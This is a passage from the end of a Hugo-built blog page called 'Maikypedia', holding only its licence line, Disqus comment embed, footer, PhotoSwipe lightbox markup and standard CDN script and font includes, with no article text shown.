  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
